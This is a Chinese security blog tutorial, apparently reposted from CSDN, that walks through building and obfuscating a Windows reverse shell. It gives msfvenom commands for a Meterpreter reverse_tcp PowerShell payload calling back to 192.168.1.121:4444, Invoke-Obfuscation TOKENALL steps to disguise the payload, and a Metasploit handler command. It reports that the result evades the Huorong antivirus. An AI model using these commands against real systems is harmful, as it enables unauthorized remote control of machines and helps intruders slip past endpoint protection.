内网渗透之Windows反弹shell(四)

本文阅读 1 分钟
首页 安全分享,WEB安全 正文

目录

Windows反弹shell

07powershell代码混淆

07powershell代码混淆

启动Invoke-Obfuscation

powershell -ep bypass

Import-Module ./Invoke-Obfuscation.psd1

Invoke-Obfuscation

img

 

启动成功

img

 

用msfvenom生成一个ps1文件

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.121 lport=4444 --arch x64 --platform wiindows -f psh-reflection -o 4444.ps1

img

 

启动完成过后,设置混淆脚本代码的位置

set scriptpath +文件位置

img

 

选择混淆方式为 TOKENALL

img

img 

 

保存混淆之后的脚本 out out.ps1

img

 

msf监听

handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.121 -P 4444

img

 

运行混淆代码,火绒不报毒

img

 

执行混淆后的文件,反弹成功了,火绒没拦截

img

 

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125924949
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复